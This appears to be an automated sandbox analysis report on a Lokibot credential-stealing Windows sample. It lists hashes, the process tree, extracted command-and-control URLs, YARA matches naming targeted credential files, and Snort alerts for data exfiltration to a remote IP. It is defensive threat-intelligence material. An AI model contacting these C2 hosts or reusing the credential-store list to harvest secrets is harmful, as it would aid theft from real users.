Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe

Overview

General Information

Sample Name:SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Analysis ID:756117
MD5:3039fa7b347872c33c247581a27a7560
SHA1:69832bbe446653f7d10eccf07069e73230138af8
SHA256:f949fda96d4810c4ffa941ecce00160b984cf7ac32cf1ca88dd4dd9583f2e480
Tags:exe

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Lokibot
Snort IDS alert for network traffic
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Yara detected aPLib compressed binary
Tries to harvest and steal ftp login credentials
Encrypted powershell cmdline option found
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign process
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe (PID: 5092 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe MD5: 3039FA7B347872C33C247581A27A7560)
    • powershell.exe (PID: 1508 cmdline: "powershell" Get-Date MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • svchost.exe (PID: 2084 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • powershell.exe (PID: 1376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 5096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • RegAsm.exe (PID: 2084 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup
Malware Configuration (Lokibot): {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sedesadre.gq/PKZ/PWS/fre.php"]}
Yara matches (matched strings, where shown, are listed as bullets under their row)

Source | Rule | Description | Author
dump.pcap | JoeSecurity_Lokibot_1 | Yara detected Lokibot | Joe Security

Source | Rule | Description | Author
00000000.00000002.521369809.0000000003243000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Lokibot_0f421617 | unknown | unknown
  • 0x437f:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Lokibot_1f885282 | unknown | unknown
  • 0x17f10:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
(table truncated on the page: 25 entries)

Source | Rule | Description | Author
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack | SUSP_XORed_URL_in_EXE | Detects an XORed URL in an executable | Florian Roth
  • 0x13e78:$s1: http://
  • 0x17633:$s1: http://
  • 0x18074:$s1: \x97\x8B\x8B\x8F\xC5\xD0\xD0
  • 0x13e80:$s2: https://
  • 0x13e78:$f1: http://
  • 0x17633:$f1: http://
  • 0x13e80:$f2: https://
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack | JoeSecurity_aPLib_compressed_binary | Yara detected aPLib compressed binary | Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack | JoeSecurity_Lokibot | Yara detected Lokibot | Joe Security
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack | INDICATOR_SUSPICIOUS_GENInfoStealer | Detects executables containing common artifacts observed in infostealers | ditekSHen
  • 0x16536:$f1: FileZilla\recentservers.xml
  • 0x16576:$f2: FileZilla\sitemanager.xml
  • 0x147e6:$b2: Mozilla\Firefox\Profiles
  • 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  • 0x146fa:$s4: logins.json
  • 0x155a4:$s6: wand.dat
  • 0x14024:$a1: username_value
  • 0x14014:$a2: password_value
  • 0x1465f:$a3: encryptedUsername
  • 0x146cc:$a3: encryptedUsername
  • 0x14672:$a4: encryptedPassword
  • 0x146e0:$a4: encryptedPassword
(table truncated on the page: 34 entries)
                No Sigma rule has matched
                Timestamp:192.168.2.7141.98.6.10249731802021641 11/29/22-16:52:33.757391
                SID:2021641
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802025381 11/29/22-16:52:28.227779
                SID:2025381
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802025381 11/29/22-16:52:26.668343
                SID:2025381
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802025381 11/29/22-16:52:31.339365
                SID:2025381
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802024313 11/29/22-16:52:30.920170
                SID:2024313
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802024318 11/29/22-16:52:30.920170
                SID:2024318
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802024317 11/29/22-16:52:25.029133
                SID:2024317
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802021641 11/29/22-16:52:29.504056
                SID:2021641
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802024312 11/29/22-16:52:25.029133
                SID:2024312
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802825766 11/29/22-16:52:27.285136
                SID:2825766
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802021641 11/29/22-16:52:27.785438
                SID:2021641
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802825766 11/29/22-16:52:31.817491
                SID:2825766
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802825766 11/29/22-16:52:28.704063
                SID:2825766
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802825766 11/29/22-16:52:33.273429
                SID:2825766
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802021641 11/29/22-16:52:32.198993
                SID:2021641
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802025381 11/29/22-16:52:33.273429
                SID:2025381
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802021641 11/29/22-16:52:28.704063
                SID:2021641
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802021641 11/29/22-16:52:31.817491
                SID:2021641
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802825766 11/29/22-16:52:26.668343
                SID:2825766
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802021641 11/29/22-16:52:36.325135
                SID:2021641
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497182025483 11/29/22-16:52:27.393637
                SID:2025483
                Source Port:80
                Destination Port:49718
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802025381 11/29/22-16:52:27.285136
                SID:2025381
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802825766 11/29/22-16:52:32.198993
                SID:2825766
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497212025483 11/29/22-16:52:28.798694
                SID:2025483
                Source Port:80
                Destination Port:49721
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497202025483 11/29/22-16:52:28.346106
                SID:2025483
                Source Port:80
                Destination Port:49720
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802024312 11/29/22-16:52:26.668343
                SID:2024312
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802021641 11/29/22-16:52:31.339365
                SID:2021641
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802024318 11/29/22-16:52:30.023507
                SID:2024318
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802024318 11/29/22-16:52:28.227779
                SID:2024318
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497242025483 11/29/22-16:52:30.593492
                SID:2025483
                Source Port:80
                Destination Port:49724
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497252025483 11/29/22-16:52:31.018575
                SID:2025483
                Source Port:80
                Destination Port:49725
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802025381 11/29/22-16:52:33.757391
                SID:2025381
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802025381 11/29/22-16:52:29.504056
                SID:2025381
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802024317 11/29/22-16:52:26.668343
                SID:2024317
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802024313 11/29/22-16:52:30.023507
                SID:2024313
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802025381 11/29/22-16:52:25.029133
                SID:2025381
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802025381 11/29/22-16:52:27.785438
                SID:2025381
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802024313 11/29/22-16:52:28.227779
                SID:2024313
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802025381 11/29/22-16:52:30.920170
                SID:2025381
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802825766 11/29/22-16:52:31.339365
                SID:2825766
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802021641 11/29/22-16:52:27.285136
                SID:2021641
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802825766 11/29/22-16:52:36.325135
                SID:2825766
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802025381 11/29/22-16:52:31.817491
                SID:2025381
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497282025483 11/29/22-16:52:32.293466
                SID:2025483
                Source Port:80
                Destination Port:49728
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802021641 11/29/22-16:52:32.689634
                SID:2021641
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802021641 11/29/22-16:52:33.273429
                SID:2021641
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802021641 11/29/22-16:52:30.488585
                SID:2021641
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802024313 11/29/22-16:52:33.757391
                SID:2024313
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802024318 11/29/22-16:52:29.504056
                SID:2024318
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802021641 11/29/22-16:52:30.920170
                SID:2021641
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802024318 11/29/22-16:52:32.198993
                SID:2024318
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802024318 11/29/22-16:52:27.785438
                SID:2024318
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802025381 11/29/22-16:52:36.325135
                SID:2025381
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802024318 11/29/22-16:52:33.757391
                SID:2024318
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802025381 11/29/22-16:52:30.023507
                SID:2025381
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802024313 11/29/22-16:52:29.504056
                SID:2024313
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802024313 11/29/22-16:52:27.785438
                SID:2024313
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802021641 11/29/22-16:52:25.029133
                SID:2021641
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497312025483 11/29/22-16:52:33.852928
                SID:2025483
                Source Port:80
                Destination Port:49731
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497302025483 11/29/22-16:52:33.400113
                SID:2025483
                Source Port:80
                Destination Port:49730
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497322025483 11/29/22-16:52:36.428850
                SID:2025483
                Source Port:80
                Destination Port:49732
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802024313 11/29/22-16:52:32.198993
                SID:2024313
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802825766 11/29/22-16:52:30.488585
                SID:2825766
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802825766 11/29/22-16:52:32.689634
                SID:2825766
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802024313 11/29/22-16:52:31.817491
                SID:2024313
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802825766 11/29/22-16:52:30.023507
                SID:2825766
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802024313 11/29/22-16:52:28.704063
                SID:2024313
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249724802025381 11/29/22-16:52:30.488585
                SID:2025381
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249721802024318 11/29/22-16:52:28.704063
                SID:2024318
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497272025483 11/29/22-16:52:31.911870
                SID:2025483
                Source Port:80
                Destination Port:49727
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497292025483 11/29/22-16:52:32.805162
                SID:2025483
                Source Port:80
                Destination Port:49729
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249727802024318 11/29/22-16:52:31.817491
                SID:2024318
                Source Port:49727
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802025381 11/29/22-16:52:32.689634
                SID:2025381
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249716802825766 11/29/22-16:52:25.029133
                SID:2825766
                Source Port:49716
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249719802825766 11/29/22-16:52:27.785438
                SID:2825766
                Source Port:49719
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249725802825766 11/29/22-16:52:30.920170
                SID:2825766
                Source Port:49725
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249717802021641 11/29/22-16:52:26.668343
                SID:2021641
                Source Port:49717
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497222025483 11/29/22-16:52:29.613062
                SID:2025483
                Source Port:80
                Destination Port:49722
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802024313 11/29/22-16:52:31.339365
                SID:2024313
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249722802825766 11/29/22-16:52:29.504056
                SID:2825766
                Source Port:49722
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497232025483 11/29/22-16:52:30.124555
                SID:2025483
                Source Port:80
                Destination Port:49723
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497262025483 11/29/22-16:52:31.441372
                SID:2025483
                Source Port:80
                Destination Port:49726
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802024313 11/29/22-16:52:36.325135
                SID:2024313
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249726802024318 11/29/22-16:52:31.339365
                SID:2024318
                Source Port:49726
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249728802025381 11/29/22-16:52:32.198993
                SID:2025381
                Source Port:49728
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249723802021641 11/29/22-16:52:30.023507
                SID:2021641
                Source Port:49723
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249732802024318 11/29/22-16:52:36.325135
                SID:2024318
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249720802021641 11/29/22-16:52:28.227779
                SID:2021641
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249718802024318 11/29/22-16:52:27.285136
                SID:2024318
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:141.98.6.102192.168.2.780497192025483 11/29/22-16:52:27.888790
                SID:2025483
                Source Port:80
                Destination Port:49719
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802024318 11/29/22-16:52:32.689634
                SID:2024318
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249731802825766 11/29/22-16:52:33.757391
                SID:2825766
                Source Port:49731
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249729802024313 11/29/22-16:52:32.689634
                SID:2024313
                Source Port:49729
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802024318 11/29/22-16:52:33.273429
                SID:2024318
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:192.168.2.7141.98.6.10249730802024313 11/29/22-16:52:33.273429
                SID:2024313
                Source Port:49730
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.7
                Destination IP:141.98.6.102
                Timestamp:11/29/22-16:52:28.704063
                SID:2025381
                Source Port:49721
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.7
                Destination IP:141.98.6.102
                Timestamp:11/29/22-16:52:30.488585
                SID:2024318
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.7
                Destination IP:141.98.6.102
                Timestamp:11/29/22-16:52:27.285136
                SID:2024313
                Source Port:49718
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.7
                Destination IP:141.98.6.102
                Timestamp:11/29/22-16:52:28.227779
                SID:2825766
                Source Port:49720
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Source IP:192.168.2.7
                Destination IP:141.98.6.102
                Timestamp:11/29/22-16:52:30.488585
                SID:2024313
                Source Port:49724
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected


                AV Detection

                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeReversingLabs: Detection: 14%
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeAvira: detected
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeJoe Sandbox ML: detected
                Source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "http://sedesadre.gq/PKZ/PWS/fre.php"]}
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Networking

                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49716 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49717 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49718 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49718
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49719 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 141.98.6.102:80 -> 192.168.2.7:49719
                Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.7:49720 -> 141.98.6.102:80
                Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.7:49720 -> 141.98.6.102:80
